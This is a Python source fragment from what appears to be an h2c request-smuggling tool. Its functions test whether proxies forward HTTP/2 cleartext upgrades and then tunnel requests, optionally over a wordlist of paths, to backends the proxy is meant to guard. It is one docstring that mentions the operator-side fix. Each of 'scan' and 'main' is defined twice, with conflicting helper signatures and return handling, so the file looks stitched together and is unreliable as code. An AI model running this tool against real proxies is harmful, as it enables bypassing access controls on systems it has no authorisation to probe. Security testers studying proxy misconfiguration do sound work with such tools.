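def scan(line):
    """Check whether one proxy URL answers an h2c upgrade request.

    Opens a TCP connection to the proxy named by ``line``, sends the initial
    HTTP/1.1 request with the upgrade fields, and prints a success line on
    stdout when ``get_upgrade_response`` reports success. A success line
    identifies a proxy that passed the upgrade through rather than refusing
    it. For the proxy operator the corresponding fix is to not forward
    ``Upgrade: h2c`` (and ``HTTP2-Settings``) from clients to backends.

    Args:
        line: Proxy URL to test. Only the ``http`` and ``https`` schemes are
            accepted; anything else is reported and skipped.

    Returns:
        None. Results are written to stdout, failures to stderr.
    """
    connection = None
    try:
        proxy_url = urlparse(line)
        # Compare the parsed scheme exactly. A prefix test on the raw line
        # also lets through strings such as "httpfoo://host", which would
        # then reach the connection helpers (not shown here) with a scheme
        # they may not expect.
        if proxy_url.scheme not in ("http", "https"):
            print("[ERROR]: skipping invalid protocol: " + line)
            return

        connection = establish_tcp_connection(proxy_url)
        h2_connection = h2.connection.H2Connection()
        settings_header_value = h2_connection.initiate_upgrade_connection()
        send_initial_request(connection, proxy_url, settings_header_value)
        _, success = get_upgrade_response(connection, proxy_url)
        if not success:
            return

        print("[INFO] Success! " + line + " can be used for tunneling")
        sys.stdout.flush()
    except Exception as e:
        # Broad catch: every failure is reported against this entry and is
        # not re-raised to the caller.
        print("[ERROR] " + str(e) + ": " + line, file=sys.stderr)
        sys.stderr.flush()
    finally:
        if connection:
            try:
                connection.shutdown(socket.SHUT_RDWR)
            except OSError:
                # shutdown() fails when the peer has already dropped the
                # connection; the descriptor must still be released, and the
                # error must not escape from the cleanup path.
                pass
            finally:
                connection.close()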
def scan(line):
    """Attempt an h2c upgrade against the proxy URL in ``line`` and report it.

    The success line is printed whenever ``get_upgrade_response`` returns
    without raising; its return value is not inspected here. Any exception is
    written to stderr together with the offending entry and is not re-raised.

    Args:
        line: Proxy URL to test.

    Returns:
        None. Results are written to stdout, failures to stderr.
    """
    sock = None
    try:
        target = urlparse(line)
        sock = establish_tcp_connection(target, None)
        # The H2 connection object is only needed for the HTTP2-Settings
        # header value that goes into the upgrade request.
        upgrade_settings = h2.connection.H2Connection().initiate_upgrade_connection()
        send_initial_request(sock, target, upgrade_settings, None)
        get_upgrade_response(sock)

        success_message = "[INFO] Success! " + line + " can be used for tunneling"
        print(success_message)
        sys.stdout.flush()
    except Exception as e:
        failure_message = "[ERROR] " + str(e) + ": " + line
        print(failure_message, file=sys.stderr)
        sys.stderr.flush()
    finally:
        # Only tear down a socket that was actually opened.
        if sock:
            sock.shutdown(socket.SHUT_RDWR)
            sock.close()
def main(args):
    """Run the client side of the h2c upgrade, then send the configured requests.

    Reads ``args.proxy``, ``args.test``, ``args.verbose``, ``args.wordlist``,
    ``args.url``, ``args.request`` and ``args.header``; ``args`` is also
    passed on to ``sendSmuggledRequest``. With ``args.test`` set, the process
    exits with status 0 as soon as the upgrade response has been read.
    """
    proxy = urlparse(args.proxy)

    # Step 1: open the TCP connection to the proxy.
    sock = establish_tcp_connection(proxy)

    # Step 2: create the H2 connection object, put it in upgrade mode, and
    # obtain the HTTP2-Settings header value for the upgrade request.
    h2_conn = h2.connection.H2Connection()
    upgrade_settings = h2_conn.initiate_upgrade_connection()

    # Step 3: send the initial HTTP/1.1 request with the upgrade fields.
    send_initial_request(sock, proxy, upgrade_settings)

    # Step 4: read the HTTP/1.1 response, looking for the 101 response.
    leftover = get_upgrade_response(sock)
    print("[INFO] h2c stream established successfully.")
    if args.test:
        print("[INFO] Success! " + args.proxy + " can be used for tunneling")
        sys.exit(0)

    # Step 5: immediately send the pending HTTP/2 data.
    sock.sendall(h2_conn.data_to_send())

    # Step 6: feed the bytes that followed the upgrade response to the H2
    # connection. The returned events are not used; step 7 collects the
    # events that get handled.
    h2_conn.receive_data(leftover)

    # Step 7: receive data and process it.
    events = getData(h2_conn, sock)
    sock.sendall(h2_conn.data_to_send())
    handle_events(events, args.verbose)

    # Build the list of request targets: one per wordlist entry resolved
    # against args.url, or args.url alone.
    if args.wordlist:
        with open(args.wordlist) as wordlist_file:
            targets = [
                urlparse(urljoin(args.url, entry.strip()))
                for entry in wordlist_file
            ]
    else:
        targets = [urlparse(args.url)]

    extra_headers = args.header if args.header else []
    for target in targets:
        path = target.path or "/"
        pseudo_headers = [
            (':method', args.request),
            (':authority', target.hostname),
            (':scheme', target.scheme),
            (':path', path),
        ]
        # User-defined headers follow the pseudo-headers.
        request_headers = pseudo_headers + [
            tuple(item.split(": ")) for item in extra_headers
        ]

        print("[INFO] Requesting - " + path)
        sendSmuggledRequest(h2_conn, sock, request_headers, args)

    # Terminate the HTTP/2 connection, then the socket.
    h2_conn.close_connection()
    sock.sendall(h2_conn.data_to_send())
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
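def main(args):
    """Run the client side of the h2c upgrade, then send the configured requests.

    Reads ``args.proxy``, ``args.test``, ``args.verbose``, ``args.wordlist``,
    ``args.url``, ``args.request`` and ``args.header``; ``args`` is also
    passed on to ``sendSmuggledRequest``.

    Exits with status 1 when the proxy URL is not ``http``/``https`` or when
    ``get_upgrade_response`` reports failure, and with status 0 in test mode
    once the upgrade has succeeded. The socket is closed on every path out of
    the function once it has been opened.
    """
    proxy_url = urlparse(args.proxy)
    # Compare the parsed scheme exactly; a prefix test on the raw string
    # would also accept values such as "httpfoo://host".
    if proxy_url.scheme not in ("http", "https"):
        print("[ERROR]: invalid protocol: " + args.proxy, file=sys.stderr)
        sys.exit(1)

    # Step 1: Establish the TCP connection.
    connection = establish_tcp_connection(proxy_url)
    try:
        # Step 2: Create H2 Connection object, put it in upgrade mode, and
        # get the value of the HTTP2-Settings header we want to use.
        h2_connection = h2.connection.H2Connection()
        settings_header_value = h2_connection.initiate_upgrade_connection()

        # Step 3: Send the initial HTTP/1.1 request with the upgrade fields.
        send_initial_request(connection, proxy_url, settings_header_value)

        # Step 4: Read the HTTP/1.1 response, look for 101 response.
        extra_data, success = get_upgrade_response(connection, proxy_url)
        if not success:
            sys.exit(1)
        print("[INFO] h2c stream established successfully.")
        if args.test:
            print("[INFO] Success! " + args.proxy + " can be used for tunneling")
            sys.exit(0)

        # Step 5: Immediately send the pending HTTP/2 data. Per the original
        # author's note this should carry the HTTP/2 "PRI" request that
        # establishes HTTP/2, and it also appears to send the initial GET
        # request again.
        connection.sendall(h2_connection.data_to_send())

        # Step 6: Feed the body data to the connection. The returned events
        # are not used; step 7 collects the events that get handled.
        h2_connection.receive_data(extra_data)

        # Step 7: Receive data and process it; at this point the response
        # has been received.
        events = getData(h2_connection, connection)
        # NOTE(review): the second argument mixes empty tuples with
        # ('host', ...) and ('path', ...) pairs; handle_events is not shown
        # here, so the expected layout should be confirmed against it.
        handle_events(
            events,
            [(), ('host', proxy_url.netloc), (), ('path', proxy_url.path)],
            args.verbose,
        )

        # Send whatever the H2 state machine queued in reply (an ack,
        # according to the original comment).
        connection.sendall(h2_connection.data_to_send())

        # Build the list of request targets: one per wordlist entry resolved
        # against args.url, or args.url alone.
        if args.wordlist:
            with open(args.wordlist) as fd:
                urls = [
                    urlparse(urljoin(args.url, url.strip()))
                    for url in fd.readlines()
                ]
        else:
            urls = [urlparse(args.url)]

        for url in urls:
            path = url.path or "/"
            smuggled_request_headers = [
                (':method', args.request),
                (':authority', url.hostname),
                (':scheme', url.scheme),
                (':path', path),
            ]

            # Add user-defined headers.
            # NOTE(review): a header without ": ", or with ": " inside its
            # value, does not split into a (name, value) pair here.
            if args.header:
                for header in args.header:
                    smuggled_request_headers.append(tuple(header.split(": ")))

            # Send request
            print("[INFO] Requesting - " + path)
            sendSmuggledRequest(h2_connection, connection,
                                smuggled_request_headers, args)

        # Terminate the HTTP/2 connection.
        h2_connection.close_connection()
        connection.sendall(h2_connection.data_to_send())
    finally:
        # Runs on normal completion, on sys.exit() and on any exception, so
        # the socket is never left open.
        try:
            connection.shutdown(socket.SHUT_RDWR)
        except OSError:
            # The peer may already have dropped the connection.
            pass
        finally:
            connection.close()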